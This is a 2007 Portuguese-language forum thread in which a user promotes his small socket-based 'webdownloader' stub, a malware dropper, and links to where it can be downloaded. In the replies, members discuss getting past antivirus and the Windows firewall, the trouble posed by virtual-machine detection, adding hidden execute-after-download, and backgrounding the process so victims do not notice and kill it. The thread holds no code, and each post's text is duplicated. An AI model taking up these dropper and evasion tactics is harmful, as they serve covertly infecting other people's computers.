Title: rog online webdownloader
Post by: rog on 15 de April , 2007, 09:55:29 PM
Post by: rog on 15 de April , 2007, 09:55:29 PM
custei mas consegui
o webdownloader estava em c++ so que o tamanho do exe estava em 75ko
releasei ele em C e agora esta em 10ko (6 com upx)
ele tem um monte de opçoes e pode baixar ate 5 arquivos (talvez eu passo isso a 10)
a tecnologia e por socket e nao usa api windows para fazer o download (o dark side me ajudou no algo do download senao eu estaria ate agora procurando o bug)
lol
http://rgirardin.mine.nu/netinstaller/ (http://rgirardin.mine.nu/netinstaller/)
vou continuar a desenvolver ele e vou tentar colocar varios tipos de injeçao
rog
o webdownloader estava em c++ so que o tamanho do exe estava em 75ko
releasei ele em C e agora esta em 10ko (6 com upx)
ele tem um monte de opçoes e pode baixar ate 5 arquivos (talvez eu passo isso a 10)
a tecnologia e por socket e nao usa api windows para fazer o download (o dark side me ajudou no algo do download senao eu estaria ate agora procurando o bug)
lol
http://rgirardin.mine.nu/netinstaller/ (http://rgirardin.mine.nu/netinstaller/)
vou continuar a desenvolver ele e vou tentar colocar varios tipos de injeçao
rog
Title: Re: rog online webdownloader
Post by: whit3_sh4rk on 16 de April , 2007, 12:22:27 PM
Post by: whit3_sh4rk on 16 de April , 2007, 12:22:27 PM
Cara... mto interessante isso.. parabéns pra tu..!
Ponto positivo..
[]s
Ponto positivo..
[]s
Title: Re: rog online webdownloader
Post by: Anonymous on 16 de April , 2007, 05:43:49 PM
Post by: Anonymous on 16 de April , 2007, 05:43:49 PM
mas a API do windows URLDOWNLOADtofile, tem uma manha para despitar os AVS 
o grande problema hoje eh a detecção de máquinas virtuais
o grande problema hoje eh a detecção de máquinas virtuais
Title: Re: rog online webdownloader
Post by: HadeS on 18 de April , 2007, 10:41:30 AM
Post by: HadeS on 18 de April , 2007, 10:41:30 AM
Rog, eu testei aqui e ele baixou o arquivo certinho, mas o arquivo aparentemente não estava inteiro. Não fez a função real dele.
E o que acha de adicionar a opção "Executar Após Baixar"?
E uma dúvida... Quando você roda o stub ele gera um outro processo em background? Se não for, não acha que seria mais interessante? Pois ele fica meio que parado por um tempo, e as pessoas poderiam desconfiar e matar o processo, ai o download não seria concluído, certo?
Valeu rog, outra ferramenta ótima! Agora no aguardo do av_tester, esse sim revolucionará!
HadeS
E o que acha de adicionar a opção "Executar Após Baixar"?
E uma dúvida... Quando você roda o stub ele gera um outro processo em background? Se não for, não acha que seria mais interessante? Pois ele fica meio que parado por um tempo, e as pessoas poderiam desconfiar e matar o processo, ai o download não seria concluído, certo?
Valeu rog, outra ferramenta ótima! Agora no aguardo do av_tester, esse sim revolucionará!
HadeS
Title: Re: rog online webdownloader
Post by: rog on 18 de April , 2007, 12:53:09 PM
Post by: rog on 18 de April , 2007, 12:53:09 PM
o codigo esta sem bug, deve ser o seu av quem bloqueou
nos meus testes ele passa o fw do windows mas e detectado pelo nod32, et nao devia ter publicado enquanto eu nao achasse um meio de passar pelo nod32
sobre a ferramente :
esse nao e um webdownloader de penetraçao furtiva (lool)
as opçoes pesam bastante no codigo que fica em torno de 10ko
e um webdownloader de penetraçao SE ;D
quando eu resolver a injeçao eu faço um webdl de penetraçao furtiva pegando em parametro so o endereço web de um arquivo a baixar e o jeito de abrir ele (hiden ou show)
so a recuperaçao da variavel de environnement do caminho windows e de lançar o exe como um thread ja pesam 30% do codigo
rog
nos meus testes ele passa o fw do windows mas e detectado pelo nod32, et nao devia ter publicado enquanto eu nao achasse um meio de passar pelo nod32
sobre a ferramente :
esse nao e um webdownloader de penetraçao furtiva (lool)
as opçoes pesam bastante no codigo que fica em torno de 10ko
e um webdownloader de penetraçao SE ;D
quando eu resolver a injeçao eu faço um webdl de penetraçao furtiva pegando em parametro so o endereço web de um arquivo a baixar e o jeito de abrir ele (hiden ou show)
so a recuperaçao da variavel de environnement do caminho windows e de lançar o exe como um thread ja pesam 30% do codigo
rog